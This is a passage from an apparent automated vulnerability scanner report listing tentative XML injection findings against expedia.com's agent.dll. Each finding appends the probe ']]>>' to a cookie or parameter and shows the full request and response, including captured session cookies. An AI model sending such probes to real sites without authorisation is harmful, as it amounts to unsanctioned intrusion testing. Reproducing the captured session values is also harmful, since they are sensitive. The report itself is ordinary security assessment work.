Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853]]>>; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:55:29 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01CDA28148$CA$BC201000$DB$27$E96$15e$9D$0D$15e$9D$0D$15e$9D$0D10001000$1E810$2302!50$14$1D$E9$AB$139I$CD$85$87Y$DF!e02000`minfo=v.5,EX01E28818AC$FB$24$DD$0C$C03$DBZz9I$A1p$99M$288$D87$113$DBU$30$60$98o$E1$F1zq$B3$DE$EA$C13$19$2B$DC$3EQ$A0$9CEf$C41$DB`264; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX010F9ECC22$FB$24$DD$0C$DD3$DBGz1I$ACp$99K$218$D80$113$DAU$2C$60$99o$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.10. https://www.expedia.com/pub/agent.dll [MC1 cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The MC1 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the MC1 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B]]>>; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:54:03 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01933B971C$7E$B9201000$D7$27$E96$7Ci$9D$0D$7Ci$9D$0D$7Ci$9D$0D10001000$1E810$2302!50$AARE$0FciB$13$82$EE.$BE!e02000`minfo=v.5,EX0136103B72$FA$24$DD$0C$C4x9$15$7B$F1$34$60$ECy$3Dh$33$E3u$12$22$DC$83$5E$0D$32UhpP$2F2$C1$35$0D$36$2A$F4$34sa$36$11$29$B8A$AB`267; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX0172845D5D$FA$24$DD$0C$D9x$11$1D$7B$F1$38$60$ECq$32q$33$E3x$12$22$D8$9F$5E$0C0`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`175; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.11. https://www.expedia.com/pub/agent.dll [U9Z5 cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The U9Z5 cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the U9Z5 cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg]]>>; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:54:57 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX014DBB3AEF$3D$BB201000$D8$27$E96gb$9D$0Dgb$9D$0Dgb$9D$0D10001000$1E810$2302!50$B2$F3$15$CA$27$8C$8B$D4$2E$38T$AE!e02000`minfo=v.5,EX01BCCE140C$FB$24$DD$0C$C03$DBZz9I$A1p$99I$298$D83$116$DEU$30$60$98o$E1$F1zq$B3$DE$EA$C33$1A$2B$D0$3EQ$A0$9CEf$C41$DB`262; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX018C501062$FB$24$DD$0C$DD3$DBGz1I$ACp$99K$218$D87$112$DEU$29$60$9Co$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.12. https://www.expedia.com/pub/agent.dll [aspp cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The aspp cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the aspp cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||]]>>; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:54:29 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX013AF86C75$5C$BC201000$F2$27$E96$E2i$9D$0D$E2i$9D$0D$E2i$9D$0D10001000$1E810$2302!50F$86$CF$BAk$F3s$A1$18$A0$C9$B1!e02000`minfo=v.5,EX01AD0F6FAC$FE$24$DD$0C$BB$0F$B0O$B4$1FC$5DX$89Y$F6$33$90$21$E8$19$87$C82$9A$16H$B7$E5$36$D0$DA$2E$3A$1D$D5$29$37$27$13$30$7B$82`275; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01D8531B53$FE$24$DD$0C$A6$17$B8D$B8$1FCRG$8DY$F9$33$90$3D$EC$19$87$FA2$9A`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`170; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.13. https://www.expedia.com/pub/agent.dll [bn_u cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The bn_u cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the bn_u cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224]]>>; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:54:49 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX010D990D7F$E2$BD201000$D8$27$E96Cb$9D$0DCb$9D$0DCb$9D$0D10001000$1E810$2302!50$B2$F3$15$CA2$8C$8B$D4$26$D1$81Y!e02000`minfo=v.5,EX01C6EB692A$FB$24$DD$0C$C03$DBZz9I$A1p$99P$298$D85$113$D8U$30$60$98o$E1$F1zq$B3$DE$EA$C33$19$2B$DB$3EQ$A0$9CEf$C41$DB`260; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01C3388FB1$FB$24$DD$0C$DD3$DBGz1I$ACp$99K$218$D84$112$D8U$2C$60$9Ao$D3`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`167; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 97905


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.14. https://www.expedia.com/pub/agent.dll [hfnm parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The hfnm parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the hfnm parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pub/agent.dll?qscr=cach&hfnm=jstooltipi.htx]]>>&flag=j&nojs=1&zkey=1010331160&zz=5 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&ussl=1&&zz=1304739356206
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:46:27 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`0`user=v.8,0,EX017275821F$F3$94201000$90$27$E96!G0.!5010$2302!50$F6$2EH$96$89$18$BC$A6!4$FF!e02000`99; Domain=.expedia.com; path=/
Content-Length: 71708


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; cha
...[SNIP]...
<a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">
...[SNIP]...
9.15. https://www.expedia.com/pub/agent.dll [iEAPID cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The iEAPID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the iEAPID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
